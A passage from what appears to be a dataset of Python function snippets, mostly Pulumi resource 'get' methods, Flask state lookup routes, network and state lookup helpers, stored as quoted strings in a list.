Zone(resource_name, opts=opts, __props__=__props__)",
"def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None,\n git_remote_settings: Optional[pulumi.Input[pulumi.InputType['RepositoryGitRemoteSettingsArgs']]] = None,\n name: Optional[pulumi.Input[str]] = None,\n project: Optional[pulumi.Input[str]] = None,\n region: Optional[pulumi.Input[str]] = None,\n workspace_compilation_overrides: Optional[pulumi.Input[pulumi.InputType['RepositoryWorkspaceCompilationOverridesArgs']]] = None) -> 'Repository':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = _RepositoryState.__new__(_RepositoryState)\n\n __props__.__dict__[\"git_remote_settings\"] = git_remote_settings\n __props__.__dict__[\"name\"] = name\n __props__.__dict__[\"project\"] = project\n __props__.__dict__[\"region\"] = region\n __props__.__dict__[\"workspace_compilation_overrides\"] = workspace_compilation_overrides\n return Repository(resource_name, opts=opts, __props__=__props__)",
"def get(self, sid: typing.Union[uuid.UUID, int]) -> bytes:\n if not self.tag.training:\n return bytes()\n if isinstance(sid, int):\n sid = self.tag.states[sid]\n if sid not in self.tag.states:\n raise Level.Invalid(f'Unknown state reference for {self}: {sid}')\n LOGGER.debug('%s: Getting state %s', self, sid)\n return STATES(self.registry, self.project.key, self.lineage.key, self.key, sid)",
"def get_network_by_name(self, name: str) -> Network:\n for network in self._networks:\n if network.name == name:\n return network\n raise errors.NotFoundError(f\"there exists no network named {name!r}\")",
"def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None,\n config: Optional[pulumi.Input[str]] = None,\n description: Optional[pulumi.Input[str]] = None,\n metadata: Optional[pulumi.Input[pulumi.InputType['SyntheticsPrivateLocationMetadataArgs']]] = None,\n name: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None) -> 'SyntheticsPrivateLocation':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = _SyntheticsPrivateLocationState.__new__(_SyntheticsPrivateLocationState)\n\n __props__.__dict__[\"config\"] = config\n __props__.__dict__[\"description\"] = description\n __props__.__dict__[\"metadata\"] = metadata\n __props__.__dict__[\"name\"] = name\n __props__.__dict__[\"tags\"] = tags\n return SyntheticsPrivateLocation(resource_name, opts=opts, __props__=__props__)",
"def view_state_id(state_id):\n states_obj = storage.all(\"State\")\n if request.method == 'GET':\n for state in states_obj.values():\n if state.id == state_id:\n id_found = state.to_dict()\n return jsonify(id_found)\n abort(404)\n\n if request.method == 'DELETE':\n for state in states_obj.values():\n if state.id == state_id:\n storage.delete(state)\n storage.save()\n return make_response(jsonify({}), 200)\n abort(404)\n\n if request.method == 'PUT':\n key = \"State.\" + state_id\n states = storage.all(\"State\")\n instance = states.get(key)\n if instance is None:\n abort(404)\n else:\n if not request.json:\n abort(400, \"Not a JSON\")\n req_var = request.get_json()\n for key, value in req_var.items():\n setattr(instance, key, value)\n storage.save()\n return make_response(jsonify(instance.to_dict()), 200)",
"def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None) -> 'ManagedNetworkGroup':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = ManagedNetworkGroupArgs.__new__(ManagedNetworkGroupArgs)\n\n __props__.__dict__[\"etag\"] = None\n __props__.__dict__[\"kind\"] = None\n __props__.__dict__[\"location\"] = None\n __props__.__dict__[\"management_groups\"] = None\n __props__.__dict__[\"name\"] = None\n __props__.__dict__[\"provisioning_state\"] = None\n __props__.__dict__[\"subnets\"] = None\n __props__.__dict__[\"subscriptions\"] = None\n __props__.__dict__[\"type\"] = None\n __props__.__dict__[\"virtual_networks\"] = None\n return ManagedNetworkGroup(resource_name, opts=opts, __props__=__props__)",
"def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None,\n algorithm: Optional[pulumi.Input[str]] = None,\n check: Optional[pulumi.Input[str]] = None,\n check_attempts: Optional[pulumi.Input[int]] = None,\n check_body: Optional[pulumi.Input[str]] = None,\n check_interval: Optional[pulumi.Input[int]] = None,\n check_passive: Optional[pulumi.Input[bool]] = None,\n check_path: Optional[pulumi.Input[str]] = None,\n check_timeout: Optional[pulumi.Input[int]] = None,\n cipher_suite: Optional[pulumi.Input[str]] = None,\n node_statuses: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['NodeBalancerConfigNodeStatusArgs']]]]] = None,\n nodebalancer_id: Optional[pulumi.Input[int]] = None,\n port: Optional[pulumi.Input[int]] = None,\n protocol: Optional[pulumi.Input[str]] = None,\n proxy_protocol: Optional[pulumi.Input[str]] = None,\n ssl_cert: Optional[pulumi.Input[str]] = None,\n ssl_commonname: Optional[pulumi.Input[str]] = None,\n ssl_fingerprint: Optional[pulumi.Input[str]] = None,\n ssl_key: Optional[pulumi.Input[str]] = None,\n stickiness: Optional[pulumi.Input[str]] = None) -> 'NodeBalancerConfig':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = _NodeBalancerConfigState.__new__(_NodeBalancerConfigState)\n\n __props__.__dict__[\"algorithm\"] = algorithm\n __props__.__dict__[\"check\"] = check\n __props__.__dict__[\"check_attempts\"] = check_attempts\n __props__.__dict__[\"check_body\"] = check_body\n __props__.__dict__[\"check_interval\"] = check_interval\n __props__.__dict__[\"check_passive\"] = check_passive\n __props__.__dict__[\"check_path\"] = check_path\n __props__.__dict__[\"check_timeout\"] = check_timeout\n __props__.__dict__[\"cipher_suite\"] = cipher_suite\n __props__.__dict__[\"node_statuses\"] = node_statuses\n __props__.__dict__[\"nodebalancer_id\"] = nodebalancer_id\n __props__.__dict__[\"port\"] = port\n __props__.__dict__[\"protocol\"] = protocol\n __props__.__dict__[\"proxy_protocol\"] = proxy_protocol\n __props__.__dict__[\"ssl_cert\"] = ssl_cert\n __props__.__dict__[\"ssl_commonname\"] = ssl_commonname\n __props__.__dict__[\"ssl_fingerprint\"] = ssl_fingerprint\n __props__.__dict__[\"ssl_key\"] = ssl_key\n __props__.__dict__[\"stickiness\"] = stickiness\n return NodeBalancerConfig(resource_name, opts=opts, __props__=__props__)",
"def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None,\n cidr: Optional[pulumi.Input[str]] = None,\n commissioning_enabled: Optional[pulumi.Input[bool]] = None,\n internet_advertising_disabled: Optional[pulumi.Input[bool]] = None,\n location: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n parent_custom_ip_prefix_id: Optional[pulumi.Input[str]] = None,\n resource_group_name: Optional[pulumi.Input[str]] = None,\n roa_validity_end_date: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n wan_validation_signed_message: Optional[pulumi.Input[str]] = None,\n zones: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None) -> 'Prefix':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = _PrefixState.__new__(_PrefixState)\n\n __props__.__dict__[\"cidr\"] = cidr\n __props__.__dict__[\"commissioning_enabled\"] = commissioning_enabled\n __props__.__dict__[\"internet_advertising_disabled\"] = internet_advertising_disabled\n __props__.__dict__[\"location\"] = location\n __props__.__dict__[\"name\"] = name\n __props__.__dict__[\"parent_custom_ip_prefix_id\"] = parent_custom_ip_prefix_id\n __props__.__dict__[\"resource_group_name\"] = resource_group_name\n __props__.__dict__[\"roa_validity_end_date\"] = roa_validity_end_date\n __props__.__dict__[\"tags\"] = tags\n __props__.__dict__[\"wan_validation_signed_message\"] = wan_validation_signed_message\n __props__.__dict__[\"zones\"] = zones\n return Prefix(resource_name, opts=opts, __props__=__props__)",
"def get_network_with_name(self, name):\n for network in self.networks:\n if network.name == name:\n return network\n return None",
"def states_by_id(id):\n list_states = storage.all('State')\n state_id = 'State.{}'.format(id)\n if state_id in list_states:\n list_states = list_states[state_id]\n else:\n list_states = None\n return render_template('9-states.html', list_states=list_states)",
"def states_id(id=None):\n all_states = storage.all(State)\n foundstate = None\n for key, state in all_states.items():\n if state.id == id:\n foundstate = state\n break\n\n return render_template('9-states.html', States=all_states, ID=id,\n Stateobj=foundstate)",
"def find_layer_from_id(self, id):\n try:\n _layer, *_ = filter(lambda x: x.Id == id, self._file3dm.Layers)\n return _layer\n except ValueError:\n return None",
"def get_state(self, cell_id: int) -> State:\n return self.states[cell_id]",
"def get_state(self) -> str:\n url = f\"{self.ha_url}/api/states/{self.entity_id}\"\n\n req = urllib.request.Request(url=url, headers=self.headers)\n with urllib.request.urlopen(req) as r:\n response = r.read().decode(\"utf\")\n return json.loads(response)[\"state\"]",
"def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None,\n direction: Optional[pulumi.Input[str]] = None,\n dry_run: Optional[pulumi.Input[bool]] = None,\n listener_id: Optional[pulumi.Input[str]] = None,\n priority: Optional[pulumi.Input[int]] = None,\n rule_actions: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['RuleRuleActionArgs']]]]] = None,\n rule_conditions: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['RuleRuleConditionArgs']]]]] = None,\n rule_name: Optional[pulumi.Input[str]] = None,\n status: Optional[pulumi.Input[str]] = None) -> 'Rule':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = _RuleState.__new__(_RuleState)\n\n __props__.__dict__[\"direction\"] = direction\n __props__.__dict__[\"dry_run\"] = dry_run\n __props__.__dict__[\"listener_id\"] = listener_id\n __props__.__dict__[\"priority\"] = priority\n __props__.__dict__[\"rule_actions\"] = rule_actions\n __props__.__dict__[\"rule_conditions\"] = rule_conditions\n __props__.__dict__[\"rule_name\"] = rule_name\n __props__.__dict__[\"status\"] = status\n return Rule(resource_name, opts=opts, __props__=__props__)",
"def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None,\n arn: Optional[pulumi.Input[str]] = None,\n core_network_arn: Optional[pulumi.Input[str]] = None,\n core_network_attachment_arn: Optional[pulumi.Input[str]] = None,\n customer_gateway_configuration: Optional[pulumi.Input[str]] = None,\n customer_gateway_id: Optional[pulumi.Input[str]] = None,\n enable_acceleration: Optional[pulumi.Input[bool]] = None,\n local_ipv4_network_cidr: Optional[pulumi.Input[str]] = None,\n local_ipv6_network_cidr: Optional[pulumi.Input[str]] = None,\n outside_ip_address_type: Optional[pulumi.Input[str]] = None,\n remote_ipv4_network_cidr: Optional[pulumi.Input[str]] = None,\n remote_ipv6_network_cidr: Optional[pulumi.Input[str]] = None,\n routes: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['VpnConnectionRouteArgs']]]]] = None,\n static_routes_only: Optional[pulumi.Input[bool]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n transit_gateway_attachment_id: Optional[pulumi.Input[str]] = None,\n transit_gateway_id: Optional[pulumi.Input[str]] = None,\n transport_transit_gateway_attachment_id: Optional[pulumi.Input[str]] = None,\n tunnel1_address: Optional[pulumi.Input[str]] = None,\n tunnel1_bgp_asn: Optional[pulumi.Input[str]] = None,\n tunnel1_bgp_holdtime: Optional[pulumi.Input[int]] = None,\n tunnel1_cgw_inside_address: Optional[pulumi.Input[str]] = None,\n tunnel1_dpd_timeout_action: Optional[pulumi.Input[str]] = None,\n tunnel1_dpd_timeout_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_enable_tunnel_lifecycle_control: Optional[pulumi.Input[bool]] = None,\n tunnel1_ike_versions: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_inside_cidr: Optional[pulumi.Input[str]] = None,\n tunnel1_inside_ipv6_cidr: Optional[pulumi.Input[str]] = None,\n tunnel1_log_options: Optional[pulumi.Input[pulumi.InputType['VpnConnectionTunnel1LogOptionsArgs']]] = None,\n tunnel1_phase1_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel1_phase1_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase1_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase1_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_phase2_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel1_phase2_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase2_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase2_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_preshared_key: Optional[pulumi.Input[str]] = None,\n tunnel1_rekey_fuzz_percentage: Optional[pulumi.Input[int]] = None,\n tunnel1_rekey_margin_time_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_replay_window_size: Optional[pulumi.Input[int]] = None,\n tunnel1_startup_action: Optional[pulumi.Input[str]] = None,\n tunnel1_vgw_inside_address: Optional[pulumi.Input[str]] = None,\n tunnel2_address: Optional[pulumi.Input[str]] = None,\n tunnel2_bgp_asn: Optional[pulumi.Input[str]] = None,\n tunnel2_bgp_holdtime: Optional[pulumi.Input[int]] = None,\n tunnel2_cgw_inside_address: Optional[pulumi.Input[str]] = None,\n tunnel2_dpd_timeout_action: Optional[pulumi.Input[str]] = None,\n tunnel2_dpd_timeout_seconds: Optional[pulumi.Input[int]] = 
None,\n tunnel2_enable_tunnel_lifecycle_control: Optional[pulumi.Input[bool]] = None,\n tunnel2_ike_versions: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_inside_cidr: Optional[pulumi.Input[str]] = None,\n tunnel2_inside_ipv6_cidr: Optional[pulumi.Input[str]] = None,\n tunnel2_log_options: Optional[pulumi.Input[pulumi.InputType['VpnConnectionTunnel2LogOptionsArgs']]] = None,\n tunnel2_phase1_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel2_phase1_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase1_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase1_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel2_phase2_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel2_phase2_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase2_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase2_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel2_preshared_key: Optional[pulumi.Input[str]] = None,\n tunnel2_rekey_fuzz_percentage: Optional[pulumi.Input[int]] = None,\n tunnel2_rekey_margin_time_seconds: Optional[pulumi.Input[int]] = None,\n tunnel2_replay_window_size: Optional[pulumi.Input[int]] = None,\n tunnel2_startup_action: Optional[pulumi.Input[str]] = None,\n tunnel2_vgw_inside_address: Optional[pulumi.Input[str]] = None,\n tunnel_inside_ip_version: Optional[pulumi.Input[str]] = None,\n type: Optional[pulumi.Input[str]] = None,\n vgw_telemetries: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['VpnConnectionVgwTelemetryArgs']]]]] = None,\n vpn_gateway_id: Optional[pulumi.Input[str]] = None) -> 'VpnConnection':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = _VpnConnectionState.__new__(_VpnConnectionState)\n\n __props__.__dict__[\"arn\"] = arn\n __props__.__dict__[\"core_network_arn\"] = core_network_arn\n __props__.__dict__[\"core_network_attachment_arn\"] = core_network_attachment_arn\n __props__.__dict__[\"customer_gateway_configuration\"] = customer_gateway_configuration\n __props__.__dict__[\"customer_gateway_id\"] = customer_gateway_id\n __props__.__dict__[\"enable_acceleration\"] = enable_acceleration\n __props__.__dict__[\"local_ipv4_network_cidr\"] = local_ipv4_network_cidr\n __props__.__dict__[\"local_ipv6_network_cidr\"] = local_ipv6_network_cidr\n __props__.__dict__[\"outside_ip_address_type\"] = outside_ip_address_type\n __props__.__dict__[\"remote_ipv4_network_cidr\"] = remote_ipv4_network_cidr\n __props__.__dict__[\"remote_ipv6_network_cidr\"] = remote_ipv6_network_cidr\n __props__.__dict__[\"routes\"] = routes\n __props__.__dict__[\"static_routes_only\"] = static_routes_only\n __props__.__dict__[\"tags\"] = tags\n __props__.__dict__[\"tags_all\"] = tags_all\n __props__.__dict__[\"transit_gateway_attachment_id\"] = transit_gateway_attachment_id\n __props__.__dict__[\"transit_gateway_id\"] = transit_gateway_id\n __props__.__dict__[\"transport_transit_gateway_attachment_id\"] = transport_transit_gateway_attachment_id\n __props__.__dict__[\"tunnel1_address\"] = tunnel1_address\n __props__.__dict__[\"tunnel1_bgp_asn\"] = tunnel1_bgp_asn\n __props__.__dict__[\"tunnel1_bgp_holdtime\"] = tunnel1_bgp_holdtime\n __props__.__dict__[\"tunnel1_cgw_inside_address\"] = tunnel1_cgw_inside_address\n __props__.__dict__[\"tunnel1_dpd_timeout_action\"] = 
tunnel1_dpd_timeout_action\n __props__.__dict__[\"tunnel1_dpd_timeout_seconds\"] = tunnel1_dpd_timeout_seconds\n __props__.__dict__[\"tunnel1_enable_tunnel_lifecycle_control\"] = tunnel1_enable_tunnel_lifecycle_control\n __props__.__dict__[\"tunnel1_ike_versions\"] = tunnel1_ike_versions\n __props__.__dict__[\"tunnel1_inside_cidr\"] = tunnel1_inside_cidr\n __props__.__dict__[\"tunnel1_inside_ipv6_cidr\"] = tunnel1_inside_ipv6_cidr\n __props__.__dict__[\"tunnel1_log_options\"] = tunnel1_log_options\n __props__.__dict__[\"tunnel1_phase1_dh_group_numbers\"] = tunnel1_phase1_dh_group_numbers\n __props__.__dict__[\"tunnel1_phase1_encryption_algorithms\"] = tunnel1_phase1_encryption_algorithms\n __props__.__dict__[\"tunnel1_phase1_integrity_algorithms\"] = tunnel1_phase1_integrity_algorithms\n __props__.__dict__[\"tunnel1_phase1_lifetime_seconds\"] = tunnel1_phase1_lifetime_seconds\n __props__.__dict__[\"tunnel1_phase2_dh_group_numbers\"] = tunnel1_phase2_dh_group_numbers\n __props__.__dict__[\"tunnel1_phase2_encryption_algorithms\"] = tunnel1_phase2_encryption_algorithms\n __props__.__dict__[\"tunnel1_phase2_integrity_algorithms\"] = tunnel1_phase2_integrity_algorithms\n __props__.__dict__[\"tunnel1_phase2_lifetime_seconds\"] = tunnel1_phase2_lifetime_seconds\n __props__.__dict__[\"tunnel1_preshared_key\"] = tunnel1_preshared_key\n __props__.__dict__[\"tunnel1_rekey_fuzz_percentage\"] = tunnel1_rekey_fuzz_percentage\n __props__.__dict__[\"tunnel1_rekey_margin_time_seconds\"] = tunnel1_rekey_margin_time_seconds\n __props__.__dict__[\"tunnel1_replay_window_size\"] = tunnel1_replay_window_size\n __props__.__dict__[\"tunnel1_startup_action\"] = tunnel1_startup_action\n __props__.__dict__[\"tunnel1_vgw_inside_address\"] = tunnel1_vgw_inside_address\n __props__.__dict__[\"tunnel2_address\"] = tunnel2_address\n __props__.__dict__[\"tunnel2_bgp_asn\"] = tunnel2_bgp_asn\n __props__.__dict__[\"tunnel2_bgp_holdtime\"] = tunnel2_bgp_holdtime\n __props__.__dict__[\"tunnel2_cgw_inside_address\"] = tunnel2_cgw_inside_address\n __props__.__dict__[\"tunnel2_dpd_timeout_action\"] = tunnel2_dpd_timeout_action\n __props__.__dict__[\"tunnel2_dpd_timeout_seconds\"] = tunnel2_dpd_timeout_seconds\n __props__.__dict__[\"tunnel2_enable_tunnel_lifecycle_control\"] = tunnel2_enable_tunnel_lifecycle_control\n __props__.__dict__[\"tunnel2_ike_versions\"] = tunnel2_ike_versions\n __props__.__dict__[\"tunnel2_inside_cidr\"] = tunnel2_inside_cidr\n __props__.__dict__[\"tunnel2_inside_ipv6_cidr\"] = tunnel2_inside_ipv6_cidr\n __props__.__dict__[\"tunnel2_log_options\"] = tunnel2_log_options\n __props__.__dict__[\"tunnel2_phase1_dh_group_numbers\"] = tunnel2_phase1_dh_group_numbers\n __props__.__dict__[\"tunnel2_phase1_encryption_algorithms\"] = tunnel2_phase1_encryption_algorithms\n __props__.__dict__[\"tunnel2_phase1_integrity_algorithms\"] = tunnel2_phase1_integrity_algorithms\n __props__.__dict__[\"tunnel2_phase1_lifetime_seconds\"] = tunnel2_phase1_lifetime_seconds\n __props__.__dict__[\"tunnel2_phase2_dh_group_numbers\"] = tunnel2_phase2_dh_group_numbers\n __props__.__dict__[\"tunnel2_phase2_encryption_algorithms\"] = tunnel2_phase2_encryption_algorithms\n __props__.__dict__[\"tunnel2_phase2_integrity_algorithms\"] = tunnel2_phase2_integrity_algorithms\n __props__.__dict__[\"tunnel2_phase2_lifetime_seconds\"] = tunnel2_phase2_lifetime_seconds\n __props__.__dict__[\"tunnel2_preshared_key\"] = tunnel2_preshared_key\n __props__.__dict__[\"tunnel2_rekey_fuzz_percentage\"] = tunnel2_rekey_fuzz_percentage\n 
__props__.__dict__[\"tunnel2_rekey_margin_time_seconds\"] = tunnel2_rekey_margin_time_seconds\n __props__.__dict__[\"tunnel2_replay_window_size\"] = tunnel2_replay_window_size\n __props__.__dict__[\"tunnel2_startup_action\"] = tunnel2_startup_action\n __props__.__dict__[\"tunnel2_vgw_inside_address\"] = tunnel2_vgw_inside_address\n __props__.__dict__[\"tunnel_inside_ip_version\"] = tunnel_inside_ip_version\n __props__.__dict__[\"type\"] = type\n __props__.__dict__[\"vgw_telemetries\"] = vgw_telemetries\n __props__.__dict__[\"vpn_gateway_id\"] = vpn_gateway_id\n return VpnConnection(resource_name, opts=opts, __props__=__props__)",
"def state(name, path=None):\n # Don't use _ensure_exists() here, it will mess with _change_state()\n\n cachekey = f\"lxc.state.{name}{path}\"\n try:\n return __context__[cachekey]\n except KeyError:\n if not exists(name, path=path):\n __context__[cachekey] = None\n else:\n cmd = \"lxc-info\"\n if path:\n cmd += f\" -P {shlex.quote(path)}\"\n cmd += f\" -n {name}\"\n ret = __salt__[\"cmd.run_all\"](cmd, python_shell=False)\n if ret[\"retcode\"] != 0:\n _clear_context()\n raise CommandExecutionError(\n f\"Unable to get state of container '{name}'\"\n )\n c_infos = ret[\"stdout\"].splitlines()\n c_state = None\n for c_info in c_infos:\n stat = c_info.split(\":\")\n if stat[0].lower() == \"state\":\n c_state = stat[1].strip().lower()\n break\n __context__[cachekey] = c_state\n return __context__[cachekey]",
"def __get_state_attr(self, prefix):\n try:\n return getattr(self, prefix + str(self.__state))\n except AttributeError:\n return getattr(self, prefix + \"default\")",
"def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None,\n databases: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n location: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n partner_servers: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['FailoverGroupPartnerServerArgs']]]]] = None,\n read_write_endpoint_failover_policy: Optional[pulumi.Input[pulumi.InputType['FailoverGroupReadWriteEndpointFailoverPolicyArgs']]] = None,\n readonly_endpoint_failover_policy: Optional[pulumi.Input[pulumi.InputType['FailoverGroupReadonlyEndpointFailoverPolicyArgs']]] = None,\n resource_group_name: Optional[pulumi.Input[str]] = None,\n role: Optional[pulumi.Input[str]] = None,\n server_name: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None) -> 'FailoverGroup':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = _FailoverGroupState.__new__(_FailoverGroupState)\n\n __props__.__dict__[\"databases\"] = databases\n __props__.__dict__[\"location\"] = location\n __props__.__dict__[\"name\"] = name\n __props__.__dict__[\"partner_servers\"] = partner_servers\n __props__.__dict__[\"read_write_endpoint_failover_policy\"] = read_write_endpoint_failover_policy\n __props__.__dict__[\"readonly_endpoint_failover_policy\"] = readonly_endpoint_failover_policy\n __props__.__dict__[\"resource_group_name\"] = resource_group_name\n __props__.__dict__[\"role\"] = role\n __props__.__dict__[\"server_name\"] = server_name\n __props__.__dict__[\"tags\"] = tags\n return FailoverGroup(resource_name, opts=opts, __props__=__props__)",
"async def station(id_or_name):\n with open(\"/data/station_data.json\") as j:\n data = json.load(j)\n # if id is passe\n if id_or_name in data:\n return data[id_or_name]\n # if name is passed\n for _, v in data.items():\n if v[\"name\"] == id_or_name:\n return v\n # if no match is found\n raise HTTPException(status_code=404, detail=\"Station not found\")",
"def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None) -> 'FirewallRule':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = dict()\n\n __props__[\"end_ip\"] = None\n __props__[\"name\"] = None\n __props__[\"start_ip\"] = None\n __props__[\"type\"] = None\n return FirewallRule(resource_name, opts=opts, __props__=__props__)",
"def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None,\n description: Optional[pulumi.Input[str]] = None,\n direction: Optional[pulumi.Input[str]] = None,\n ethertype: Optional[pulumi.Input[str]] = None,\n port_range_max: Optional[pulumi.Input[int]] = None,\n port_range_min: Optional[pulumi.Input[int]] = None,\n protocol: Optional[pulumi.Input[str]] = None,\n region: Optional[pulumi.Input[str]] = None,\n remote_group_id: Optional[pulumi.Input[str]] = None,\n remote_ip_prefix: Optional[pulumi.Input[str]] = None,\n security_group_id: Optional[pulumi.Input[str]] = None,\n tenant_id: Optional[pulumi.Input[str]] = None) -> 'SecGroupRule':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = _SecGroupRuleState.__new__(_SecGroupRuleState)\n\n __props__.__dict__[\"description\"] = description\n __props__.__dict__[\"direction\"] = direction\n __props__.__dict__[\"ethertype\"] = ethertype\n __props__.__dict__[\"port_range_max\"] = port_range_max\n __props__.__dict__[\"port_range_min\"] = port_range_min\n __props__.__dict__[\"protocol\"] = protocol\n __props__.__dict__[\"region\"] = region\n __props__.__dict__[\"remote_group_id\"] = remote_group_id\n __props__.__dict__[\"remote_ip_prefix\"] = remote_ip_prefix\n __props__.__dict__[\"security_group_id\"] = security_group_id\n __props__.__dict__[\"tenant_id\"] = tenant_id\n return SecGroupRule(resource_name, opts=opts, __props__=__props__)",
"def get_net_details(self, net_name=\"dummy_net\", net_id=None):\n _url = \"http://\" + self.host_ip + \":9696/v2.0/networks\"\n _headers = {'x-auth-token': self.project_info[\"token_project\"]}\n _body = None\n\n result = self.request(\"GET\", _url, _headers, _body)\n if result is None:\n LOG_OBJ.error(\"No response from Server while listing the nets\")\n return result.status\n if result.status not in [200, 201, 202, 203, 204]:\n LOG_OBJ.error(\"Get network Failed with status %s \" % result.status)\n return result.status\n output = json.loads(result.data)\n\n for nets in output['networks']:\n if (net_id is not None and (nets['id'] == net_id)) or \\\n nets['name'].lower() == net_name.lower():\n LOG_OBJ.debug(\"Net details : %s \" % nets)\n return nets\n\n LOG_OBJ.debug(\"Network with name:%s or with ID:%s is Not Found\" %\n (net_name, net_id))",
"def from_esi_name(cls, esi_state_name: str) -> \"Structure.State\":\n STATES_ESI_MAP = {\n \"anchor_vulnerable\": cls.ANCHOR_VULNERABLE,\n \"anchoring\": cls.ANCHORING,\n \"armor_reinforce\": cls.ARMOR_REINFORCE,\n \"armor_vulnerable\": cls.ARMOR_VULNERABLE,\n \"deploy_vulnerable\": cls.DEPLOY_VULNERABLE,\n \"fitting_invulnerable\": cls.FITTING_INVULNERABLE,\n \"hull_reinforce\": cls.HULL_REINFORCE,\n \"hull_vulnerable\": cls.HULL_VULNERABLE,\n \"online_deprecated\": cls.ONLINE_DEPRECATED,\n \"onlining_vulnerable\": cls.ONLINING_VULNERABLE,\n \"shield_vulnerable\": cls.SHIELD_VULNERABLE,\n \"unanchored\": cls.UNANCHORED,\n \"offline\": cls.POS_OFFLINE,\n \"online\": cls.POS_ONLINE,\n \"onlining\": cls.POS_ONLINING,\n \"reinforced\": cls.POS_REINFORCED,\n \"unanchoring \": cls.POS_UNANCHORING,\n }\n return (\n STATES_ESI_MAP[esi_state_name]\n if esi_state_name in STATES_ESI_MAP\n else cls.UNKNOWN\n )",
"def format_state(data):\n if us.states.lookup(data) is None:\n return None\n else:\n return us.states.lookup(data).name",
